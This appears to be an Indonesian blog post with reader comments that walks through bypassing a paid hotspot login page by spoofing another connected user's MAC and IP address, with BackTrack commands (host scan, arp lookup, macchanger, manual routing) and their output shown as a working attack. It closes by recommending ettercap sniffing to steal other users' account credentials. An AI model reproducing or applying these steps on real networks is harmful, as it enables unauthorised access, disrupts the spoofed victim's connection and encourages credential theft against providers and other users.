bypass gateway hotspot login page :D

Pada saat kita ingin menikmati layanan internet baik di kampus, hotel, cafe, dan tempat umum lainya, Biasanya kita akan di redirect atau dialihkan terlebih dahulu ke halaman login sebelum bisa koneksi internet. proses tersebut disebut proses authentikasi sebagai kelayakan bahwa anda adalah orang yang berhak atas layanan yang tersedia.

Contohnya : Anda adalah mahasiswa dimana di kampus anda terdapat fasilitas hotspot yang menggunakan login page dengan menggunakan id mahasiswa sebagai username dan password id sebagai passwordnya. jika anda memasukan username dan password dengan benar sudah pasti anda dapat menikmati layanan hotspot kampus. Sebetulnya beberapa cara yang dapat dilakukan untuk mendapatkan akses hotspot, juga tergantung dari penyedia layanan. Misalnya ada layanan hotspot yang menggunakan kartu kredit dan prepaid card, Pihak penyedia akan memberikan username dan password dengan begitu andapun dapat menikmati layanan sampai kredit akses anda habis.

oke segitu aja contohnya, nah loh klo g punya username dan password cuma bisa gigit jari dunk πŸ˜€ ?? up’s tenang aja biasanya hotspot public g secure-secure banget.. jadi kita bypass aja pake teknik Piggybacking (membonceng). Dengan teknik Piggybacking kita membonceng koneksi dari orang lain yang sudah menikmati koneksi internet. Teknik dah di coba di kampus gw sendiri dan ternyata berhasil !!

Gw pake backtrack coz complete (klo linux lain harus install macchanger). pertama kita masuk ke koneksi jaringan lokal dulu, cari akses point kemudian setup selanjutnya dapatkan alamat ip (dhcp aja)

root@bt:~# ifconfig wlan0 up
root@bt:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"HotZone Lt.3"
                    ESSID:"802.11g-SSID"
root@bt:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@bt:~# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/wlan0/00:21:5d:4d:16:72
Sending on   LPF/wlan0/00:21:5d:4d:16:72
Sending on   Socket/fallback
DHCPNAK from 192.168.108.1
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.108.119 from 192.168.108.1
DHCPREQUEST of 192.168.108.119 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.108.119 from 192.168.108.1
bound to 192.168.108.119 -- renewal in 20738 seconds.

Kita udah konek ke jaringan dengan alamat ip 192.168.108.119, kita check dulu koneksi ke gateway atau router

root@bt:~# ping 192.168.108.1
PING 192.168.108.1 (192.168.108.1) 56(84) bytes of data.
64 bytes from 192.168.108.1: icmp_seq=1 ttl=64 time=2350 ms
64 bytes from 192.168.108.1: icmp_seq=2 ttl=64 time=1633 ms

Test koneksi oke, saatnya ngcheck koneksi internet..

root@bt:~# ping google.co.id
PING google.co.id (72.14.254.104) 56(84) bytes of data.

g dapet balasan, ini tandanya kita belum berhak buat internetan, disinilah teknik Piggybacking kita terapkan… πŸ™‚ scan ip pake scan-ip.sh buat nyari host yang live di dalam jaringan dimana nantinya kita akan minta bonceng dari ip yang live tersebut.

null

ada 4 host yang hidup, kita jadiin korban yang memiliki ip : 192.168.108.104. check koneksinya lagi biar yakin bahwa host tersebut hidup.

root@bt:~# ping 192.168.108.104
PING 192.168.108.104 (192.168.108.104) 56(84) bytes of data.
64 bytes from 192.168.108.104: icmp_seq=1 ttl=128 time=170 ms
64 bytes from 192.168.108.104: icmp_seq=2 ttl=128 time=26.8 ms

host oke, get mac addres dengan melihat tabel arp.

root@bt:~# arp -a
? (192.168.108.104) at 00:21:5c:3a:de:f1 [ether] on wlan0
? (192.168.108.1) at aa:00:04:00:0a:04 [ether] on wlan0

sip !! kita udah dapet alamat mac 00:21:5c:3a:de:f1 dari host 192.168.108.104
selanjutnya matikan interface kemudian ganti alamat mac kita dengan alamat mac korban menggunakan tools macchanger.

root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger -m 00:21:5c:3a:de:f1 wlan0
Current MAC: 00:21:5d:4d:16:72 (unknown)
Faked MAC:   00:21:5c:3a:de:f1 (unknown)

coba check apakah alamat mac addres kita sudah berubah..

root@bt:~# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:21:5c:3a:de:f1
          inet addr:192.168.108.104  Bcast:192.168.108.255  Mask:255.255.255.0

wow sudah berubah… πŸ˜€ hidupkan interface dan koneksikan kembali, setup alamat ip dengan alamat ip sang korban..

 root@bt:~# ifconfig wlan0 up
root@bt:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"HotZone Lt.3"
                    ESSID:"802.11g-SSID"
root@bt:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@bt:~# ifconfig wlan0 192.168.108.104/24
root@bt:~# route add default gw 192.168.108.1

sekarang kita cobain ping ke google.co.id..

root@bt:~# ping google.co.id
PING google.co.id (72.14.254.104) 56(84) bytes of data.
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=1 ttl=55 time=695 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=2 ttl=55 time=76.8 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=3 ttl=55 time=38.6 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=4 ttl=55 time=25.1 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=5 ttl=55 time=27.2 ms

wah koneksi jalan, yes Piggybacking sukses.. πŸ™‚
sampai sini anda bisa menikmati koneksi internet hasil berbonceng dari host 192.168.108.104. klo misal itu yang punya host off kita udah g bisa konek inet. namanya juga boncengan klo yang ngeboncengin mau udahan yah kita ikut udahan hehehe πŸ˜€

klo g mau pake teknik piggybacking curi aja account pke teknik sniffing buat ngintip aliran data username dan password. toolsnya gw saranin pake ettercap..

g00d Luck !!

Advertisements
This entry was posted in BackTrack. Bookmark the permalink.

6 Responses to bypass gateway hotspot login page :D

  1. syntax says:

    om mw nanya nih… om daerah bekasi? leptop saya gk isa backtrack nih.. wlan ma eth nya gk nongol… apa gk cocok taw gmn nih? kira” bisa di akalin gk om?
    (tipe satellite L635)
    makasih nih om sebelumnya

    • abi71 says:

      sebelumnya makasih udah mampir dan koment, hehehe πŸ™‚
      ya, daerah bekasi

      pake bt versi apa final atau pre ? biasanya ini masalah kernel yang belum mampu mendeteksi perangkat harware laptop .

      solusi :

      menurut pengalaman, pertama cari tau driver lan dan wan, klo dah ketemu silakan browsing di google dengan kata kunci yang berbau canibal driver lan atau wlan ente.
      biasanya gitu pke teknik kanibal driver klo g kedetect di linux.
      untuk lebih membantu silakan join di http://forum.linux.or.id

      semoga membantu,

  2. nur_ihsan says:

    gan,ane ijin ngambil referensi dari sini ya buat nge-jawab di forum dari backtrackuser http://kask.us/4672176 kalo ga boleh,kirim email aja biar cepat responsenya.thanks for sharing.

  3. xerxesbreak says:

    Mas, mw nanya neh. saya coba kok g bisa y? wktu saya ketikkan ‘dhclient wlan0’ ny yg keluar cma bagian dhcpdiscover sampai 5 kali, habis ntu dia berhenti aja langsung. ada solusinya g mas?

    • abi71 says:

      dhcp gagal bound, kemungkinan tidak ada layanan dhcp server / ip otomatis baik pada gateway maupun host lain. mau tidak mau mas harus setting secara manual dengan syarat mengetahui subnet networknya.

      terimakasih telah berkunjung.. πŸ˜€

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s